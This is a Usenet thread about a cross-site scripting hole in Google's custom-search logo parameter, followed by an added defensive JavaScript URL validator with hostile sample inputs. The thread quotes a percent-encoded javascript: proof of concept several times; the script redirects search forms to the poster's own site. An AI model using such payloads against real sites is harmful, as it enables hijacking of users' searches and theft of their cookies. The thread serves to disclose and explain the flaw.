Hello NS
N> The commentators on the ITV website are spitting blood.
What an odd search engine they've got on that page.
Refers query direct to google.com, but replaces the google graphic
with the ITV one.
I wonder if Google know?
And I wanted to search /their/ site, not the whole sodding internet.
--
Simon Avery, Devon, UK
Opinions expressed are mine, not my employers.
Working for the Mare & Foal Sanctuary;
http://www.mareandfoal.org/
Personal: http://www.digdilem.org/
>XC: #UK.NET.WEB.AUTHORING #ZZ_OUTBOUND
>NS <webm...@newsservers.co.uk.INVALID> wrote:
>
>Hello NS
>
> N> The commentators on the ITV website are spitting blood.
>
>What an odd search engine they've got on that page.
>
>Refers query direct to google.com, but replaces the google graphic
>with the ITV one.
Google have a feature that lets you put any image at the top of
google:
Here's Google with my shepherds image...
<URL:
http://www.google.com/custom?cof=L:http://jibbering.com/imgs/shepherds.jpg
>
and here's a hijacked Google search where it's routed to my site...
I'd suggest even the first is a bug, the second is definitely a script
hole - the script hole isn't particularly serious as long as you don't
give google any private information...
Jim.
> Here's Google with my shepherds image...
>
> <URL:
> http://www.google.com/custom?cof=L:http://jibbering.com/imgs/shepherds.jpg
>
>
> and here's a hijacked Google search where it's routed to my site...
>
> <URL:
> http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> %7d
>
>
> I'd suggest even the first is a bug, the second is definitely a script
> hole - the script hole isn't particularly serious as long as you don't
> give google any private information...
What do you mean? I couldn't see what exactly it was that I'm supposed
to be seeing in the second example.
Daniele
--
Apple Juice. Macintosh service, support and sales, Cardiff
www.apple-juice.co.uk 029 2041 0050
Are you good at web design/development & Mac support? Would
you like to earn a living doing it in Cardiff? Get in touch.
>Jim Ley <j...@jibbering.com> wrote:
>>
>> I'd suggest even the first is a bug, the second is definitely a script
>> hole - the script hole isn't particularly serious as long as you don't
>> give google any private information...
>
>What do you mean? I couldn't see what exactly it was that I'm supposed
>to be seeing in the second example.
Assuming you're using IE or Mozilla on windows and probably other
systems (they need to support javascript: pseudo protocol for images)
and have scripting enabled, the second example will send all
searches to a page on jibbering.com
Jim.
> Jim Ley <j...@jibbering.com> wrote:
>
> > here's a hijacked Google search where it's routed to my site...
> >
> > <URL:
> > http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> > %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> > f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> > 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> > %7d
[...]
> > definitely a script hole - the script hole isn't particularly
> > serious as long as you don't give google any private information...
>
> What do you mean? I couldn't see what exactly it was that I'm supposed
> to be seeing in the second example.
Go to google.com and search for "apple-juice.co.uk". Then try doing it
via Jim's link.
Peter
> > > here's a hijacked Google search where it's routed to my site...
> > >
> > > <URL:
> > > http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> > > %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> > > f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> > > 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> > > %7d
>
> [...]
>
> > > definitely a script hole - the script hole isn't particularly
> > > serious as long as you don't give google any private information...
> >
> > What do you mean? I couldn't see what exactly it was that I'm supposed
> > to be seeing in the second example.
>
> Go to google.com and search for "apple-juice.co.uk". Then try doing it
> via Jim's link.
Right - I get a slightly different set of results, presumably because
the search from Jim's link included some of search preferences in it.
But I don't understand why it's a problem, or could be.
> Assuming you're using IE or Mozilla on windows and probably other
> systems (they need to support javascript: pseudo protocol for images)
> and have scripting enabled, the second example will send all
> searches to a page on jibbering.com
You mean, it will tell you what I'm searching for, without my noticing
it?
>Peter Robinson <pmrob...@mail.com> wrote:
>
>Right - I get a slightly different set of results, presumably because
>the search from Jim's link included some of search preferences in it.
>
>But I don't understand why it's a problem, or could be.
Like many security problems it doesn't affect all browsers, so
obviously doesn't work with yours, on win32 IE it redirects the search
to a page on my website. As I can execute script in the context of
google, I can get any information you tell google, your searches, your
cookies.
Jim.
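
Added example (not part of any post in this thread, and not Google's code): one way a server could check the logo URL from a `cof=L:<url>` parameter before writing it into an image tag, so that a percent-encoded `javascript:` value like the one discussed above is rejected. The function name, the http/https allowlist and the sample inputs are assumptions constructed for illustration.

```javascript
// Allowlist of schemes an image URL may use (assumed policy for this example).
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Takes a raw query string such as "cof=L:http://example.org/logo.png".
// Returns the normalised http(s) URL to emit, or null if it must be rejected.
function safeLogoUrl(queryString) {
  // URLSearchParams percent-decodes once, as a server's query parser would,
  // so "%6a%61%76%61..." is seen here as the plain text it encodes.
  const cof = new URLSearchParams(queryString).get("cof");
  if (cof === null || !cof.startsWith("L:")) return null;

  let parsed;
  try {
    // The WHATWG URL parser applies the same clean-up a browser does
    // (leading spaces dropped, tabs and newlines removed), so a scheme
    // check on its output cannot be dodged with "java<TAB>script:".
    parsed = new URL(cof.slice(2));
  } catch {
    return null; // relative, empty or unparseable value
  }

  // Check the parsed scheme, never a prefix of the raw string.
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;

  // Emit the parser's serialisation, so what reaches the page is exactly
  // the value that was validated.
  return parsed.href;
}

// Constructed sample inputs: the benign image URL from the thread, then
// values a naive "starts with http" or "contains javascript:" test mishandles.
const samples = [
  "cof=L:http://jibbering.com/imgs/shepherds.jpg",
  "cof=L:%6a%61%76%61%73%63%72%69%70%74%3avoid(0)",
  "cof=L:%20java%09script:void(0)",
  "cof=L:data:text/html,x",
  "cof=L:/imgs/logo.png",
];
for (const s of samples) {
  console.log(s, "->", safeLogoUrl(s));
}
```

Only the first sample is accepted; the rest return null because the scheme is judged after decoding and parsing rather than by matching the raw text.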